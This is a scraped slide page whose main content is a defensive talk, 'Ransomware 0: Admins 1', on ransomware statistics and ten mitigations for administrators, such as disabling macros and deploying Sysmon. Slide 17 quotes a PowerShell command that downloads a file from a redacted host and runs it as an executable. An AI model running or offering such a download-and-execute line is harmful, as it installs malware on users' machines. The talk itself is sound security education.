Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 

Dernier (20)

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 

Ransomware 0 admins 1

  • 1. Ransomware 0: Admins 1 Kieran Jacobsen
  • 2. Kieran Jacobsen • Work at Readify • Technical Lead • Twitter: @Kjacobsen • Poshsecurity.com • PlanetPowerShell.com
  • 4. The impact of ransomware 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% Source: CyberEdge
  • 5. Threat Hirerachy 1. Malware (viruses, worms, trojans). 2. Phishing. 3. Insider threats. 4. APT. 5. Ransomware 6. Web Application Attacks. 7. SSL-encrypted threats. 8. DoS/DDoS 9. Drive-by & watering-hole Source: CyberEdge
  • 6. Impacted Verticals 0% 10% 20% 30% 40% 50% 60% 70% 80% Technology Financial Services Healthcare Government Source: CyberEdge
  • 7. The Rising Cost of Ransomware Bitcoin Exchange Rate (USD)
  • 8. How Does it Get in? Source: Osterman Research 0% 5% 10% 15% 20% 25% 30% 35% Email link Email attachment Website (non- social media) Social Media USB Stick Business Application Unknown
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17. cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('h ttp://<omitted>/2011/stinfo.pdf','%TM P%yvatu.exe');Start-Process '%TMP%yvatu.exe
  • 19.
  • 20.
  • 21. 1. Disable macros • Significantly impacts infection chain. • 31% of ransomware infections came from email attachments, typically Word document with macros. • Either: • Disable All • Disable macros marked as from the internet • https://decentsecurity.com/enterprise/#/block-office-macros/
  • 22. 2. Don’t run as admin • Significantly impacts infection chain. • Rethink developer and sysadmin privileges. • Old Rant by Jeff Atwood: https://blog.codinghorror.com/the-windows- security-epidemic-dont-run-as-an-administrator/
  • 24. 3. Configure UAC • UAC elevation requests are passed to the Antimalware Scan Interface (AMSI). • https://www.tenforums.com/tutorials/3577- change-user-account-control-uac-settings- windows-10-a.html
  • 25. 4. Open scripts in notepad • .ps1 files do not execute when double-clicked. • Change the following to open in notepad: • .bat (often overlooked) • .vbe and .vbs • .wsh and wsf • .js and .jse • http://www.dankalia.com/tutor/01002/0100201018.htm
  • 26. 5a. EMET • Enhanced Mitigation Experience Toolkit – New EOL date 2018-08-31. • Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR • Provides configuration SSL/TLS certificate pinning. • Provides ability to block untrusted fonts. • Group Policy ADM/ADMX files. • Bundled with recommended protections for a variety of Microsoft and 3rd Party Apps. • Disable protections on Chrome due to conflicts. • http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
  • 27. 5b. Inbuilt protections in Windows 10 • Windows: • Windows 10, version 1607 and later • Windows Server 2016 • On for all 64bit processes: DEP, SEHOP and ASLR. • Configurable protections: DEP, DEP-ATL Trunk, SEHOP, Mandatory ASLR, Bottom Up ASLR • Configurable by, well, Group Policy. • https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override- mitigation-options-for-app-related-security-policies?f=255&MSPPError=- 2147217396
  • 28. 6. Deploy Chrome and Firefox • Reduces issues caused by users attempting to install 3rd party browsers. • Chrome is the leader of the pack, followed by Edge for security. • Chrome has ADM/ADMX files for Group Policy, Firefox has 3rd party Group Policy support • Chrome: http://goo.gl/2QvOT • Firefox: https://developer.mozilla.org/en- US/Firefox/Enterprise_deployment
  • 30. 7. Block Ads • Internet Explorer: https://decentsecurity.com/adblocking-for- internet-explorer-deployment/ • Edge: https://www.microsoft.com/en- us/store/p/adblock/9nblggh4rfhk • Chrome: https://decentsecurity.com/ublock-for-google-chrome- deployment/ • Firefox: https://decentsecurity.com/ublock-for-firefox- deployment/
  • 31. 8. Filter common email attacks • Identify common phrases and syntax in Phishing and Ransomware emails. • Quarantine them before they get to your users. • https://github.com/SwiftOnSecurity/PhishingRegex
  • 32. 9. Enable SPF, DKIM and DMARC • SPF: Domain owner specifies servers allowed to send email. • DKIM: A domain assets responsibility for sending emails. • DMARC: Combined SPF + DKIM, allows policy assertions and collection of data. • https://dmarc.org/presentations/Email-Authentication- Basics-2015Q2.pdf
  • 33. 9. Enable SPF, DKIM and DMARC Alexa Top 500 - DMARC Usage DMARC No DMARC Source: Detectify
  • 34. 10. Implement SYSMON Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon ) + Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ ) + Free SIEM from Gray Log ( https://www.graylog.org/ ) + Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon ) = Awesome Dashboard